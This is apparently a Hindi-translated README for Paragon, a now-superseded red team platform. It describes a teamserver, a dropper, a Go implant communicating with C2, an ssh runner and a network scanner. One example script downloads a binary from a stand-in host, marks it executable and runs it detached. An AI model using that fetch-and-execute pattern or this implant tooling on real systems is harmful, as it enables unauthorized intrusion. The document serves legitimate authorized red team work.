
लाल टीम जुड़ाव मंच जिसका लक्ष्य एक सरल UI के पीछे आक्रामक उपकरणों को एकीकृत करना है।
यह परियोजना अप्रचलित हो चुकी है, कृपया हमारे नए Realm प्रोजेक्ट को देखें, जो इस रेपो को बनाते समय हमारे पास मौजूद कई विचारों पर आधारित है।

Paragon एक रेड टीम एंगेजमेंट प्लेटफॉर्म है। इसका उद्देश्य सरल UI के पीछे आक्रामक उपकरणों को एकीकृत करना है, जो अधिकांश बैकएंड कार्य को सारगर्भित करता है ताकि ऑपरेटर इम्प्लांट लिखने पर ध्यान केंद्रित कर सकें और डेटाबेस और css की चिंता में कम समय बिता सकें। रिपॉजिटरी में Paragon के साथ पहले से एकीकृत कुछ आक्रामक उपकरण भी शामिल हैं जिनका उपयोग एंगेजमेंट के दौरान किया जा सकता है।
यह रिपॉजिटरी अभी भी भारी विकास के अधीन है और उत्पादन उपयोग के लिए तैयार नहीं है। जब इसे स्थिर माना जाएगा, तो V1.0.0 टैग जारी किया जाएगा। तब तक, API में ब्रेकिंग चेंजेस हो सकते हैं क्योंकि हम अपने डिज़ाइन को लगातार सरल बना रहे हैं। यदि आप इस मील का पत्थर तेजी से पहुँचने में हमारी मदद करना चाहते हैं, तो कृपया नीचे डेवलपर दस्तावेज़ पढ़ें।
एक त्वरित प्रदर्शन इंस्टेंस को रिपॉजिटरी को क्लोन करके और docker-compose up चलाकर सेट किया जा सकता है। आरंभ करने के लिए अपने ब्राउज़र में 127.0.0.1:80 खोलें!
उपयोग की गई इमेजेस docker-hub पर उपलब्ध हैं, और उत्पादन परिनियोजन के लिए docker-compose फ़ाइल से कॉन्फ़िगर किया जा सकता है।
इस रिपॉजिटरी में अधिकांश घटक एक Python-जैसी स्क्रिप्टिंग भाषा पर निर्भर करते हैं जो उनके व्यवहार के शक्तिशाली नियंत्रण और अनुकूलन को सक्षम बनाती है। यह भाषा Google के starlark का एक संशोधित संस्करण है, जिसे ऑपरेटरों के लिए क्रॉस-प्लेटफ़ॉर्म कार्यक्षमता के साथ बढ़ाया गया है। यह एजेंट और ड्रॉपर जैसे टूल्स (नीचे चर्चा की गई) को सिस्टम बाइनरी (curl, bash, आदि) पर निर्भर हुए बिना कार्यों को निष्पादित करने में सक्षम बनाता है। सभी संचालन Golang में कोड के रूप में निष्पादित होते हैं, इसलिए स्क्रिप्टिंग वातावरण में अतिरिक्त कार्यक्षमता जोड़ना सहज है। यहाँ एक उदाहरण स्क्रिप्ट है:
# Download a file via https, execute it, and don't keep it as a child process.
load("sys", "request")
new_bin = "/tmp/kqwncWECaaV"
request("https://library.redteam.tld", writeToFile=new_bin)
# set new_bin permissions to 0755
chmod(new_bin, ownerRead=True, ownerWrite=True, ownerExec=True, groupRead=True, groupExec=True, worldRead=True, worldExec=True)
exec(new_bin, disown=True)
एक सरल वेब एप्लिकेशन और GraphQL API प्रदान करता है जो रेड टीम नॉलेज ग्राफ के साथ इंटरफेस करता है, उपकरणों को सत्य के एक केंद्रीकृत स्रोत के पीछे एकीकृत करता है और ऑपरेटरों से कई कष्टप्रद बैकएंड चिंताओं को सारगर्भित करता है। अपने कस्टम टूल्स को टीमसर्वर के साथ एकीकृत करें (GraphQL API या इवेंट सब्सक्रिप्शन का उपयोग करके) बैकएंड कार्य पर समय बचाने के लिए। टीमसर्वर सभी गतिविधि रिकॉर्ड करता है, इसलिए आपके सभी उपकरण एक स्थान पर एकीकृत होने पर, पोस्ट-एंगेजमेंट रिपोर्ट लिखना काफी आसान हो जाता है।
नीचे दिए गए उपकरण भी रिपॉजिटरी में शामिल हैं। इन्हें कई क्रॉस-प्लेटफ़ॉर्म उपयोग मामलों में फिट करने के लिए आसानी से विस्तारित किया जा सकता है।
Paragon संपत्तियों (बाइनरी, स्क्रिप्ट, आदि) को एक एकल बाइनरी में पैकेज करने के लिए एक उपकरण प्रदान करता है जो निष्पादित होने पर आपकी कस्टम परिनियोजन स्क्रिप्ट को निष्पादित करेगा जो फाइलसिस्टम पर संपत्तियां लिख सकता है, प्रक्रियाएं लॉन्च कर सकता है, फाइलें डाउनलोड कर सकता है, त्रुटियों को संभाल सकता है, और बहुत कुछ कर सकता है। यह पूरी तरह से क्रॉस-प्लेटफ़ॉर्म और स्थिर रूप से संकलित है, जो विश्वसनीय परिनियोजन प्रदान करता है। यदि आप इसकी कार्यक्षमता बढ़ाना चाहते हैं, तो आप संकलन से पहले उत्पन्न golang फ़ाइल को आसानी से विस्तारित कर सकते हैं।
एक इम्प्लांट जो कार्यों को निष्पादित करता है और निष्पादन परिणामों की रिपोर्ट करता है। यह डिफ़ॉल्ट रूप से Paragon की Python-जैसी स्क्रिप्टिंग भाषा का उपयोग करके कार्यों को निष्पादित करने और http(s) के माध्यम से C2 के साथ संचार करने के लिए कॉन्फ़िगर किया गया है। यह Go में लिखा गया है, और नए ट्रांसपोर्ट तरीके (जैसे DNS), निष्पादन विकल्प, फेलओवर लॉजिक, और अधिक जोड़ने के लिए जल्दी से संशोधित किया जा सकता है।
एजेंट और टीमसर्वर के बीच एक मध्यस्थ के रूप में कार्य करता है। यह विभिन्न संचार तंत्रों के लिए एजेंट कॉलबैक को संभालता है, और इसे टीमसर्वर क्यू से नए कार्य प्रदान करता है।
कॉलबैक की प्रतीक्षा करने के बजाय, कुछ स्थितियों में किसी कार्य को जल्दी से निष्पादित करने और उसके आउटपुट को देखने के लिए एक फॉरवर्ड कनेक्शन की आवश्यकता हो सकती है। रनर इसे कार्य क्यू की सदस्यता लेकर और लक्ष्य मशीन (जैसे ssh का उपयोग करके) के साथ कनेक्शन स्थापित करके पूरा करता है। यह शेल-जैसे एकीकरण को इम्प्लांट और C2 के समान इंटरफ़ेस का उपयोग करने में सक्षम बनाता है। यह इस इंटरफ़ेस के माध्यम से प्रारंभिक इम्प्लांट परिनियोजन की अनुमति भी देता है।
लक्ष्य नेटवर्क गतिविधि और दृश्य सेवाओं की निगरानी करें। एंगेजमेंट नेटवर्क का एक ग्राफ तैयार करें, और स्थिति परिवर्तनों (जैसे ssh उपलब्ध हो जाता है) पर ऑटोमेशन ट्रिगर करें।
टीमसर्वर के लिए PG_KS_MachineUUID किलस्विच एनवायरनमेंट वेरिएबल सेट करने से मशीन UUID का उपयोग करने वाले लुकअप अक्षम हो जाएंगे।
इन जटिल प्रणालियों के बारे में स्पष्ट संचार सुनिश्चित करने के लिए, हमने नीचे कुछ परियोजना-विशिष्ट शब्दों की रूपरेखा दी है जिनका उपयोग परियोजना के दस्तावेज़ीकरण में किया जाएगा।
एंगेजमेंट के दौरान समझौता किए गए सिस्टम पर चलाया जाने वाला कोई भी दुर्भावनापूर्ण सॉफ्टवेयर।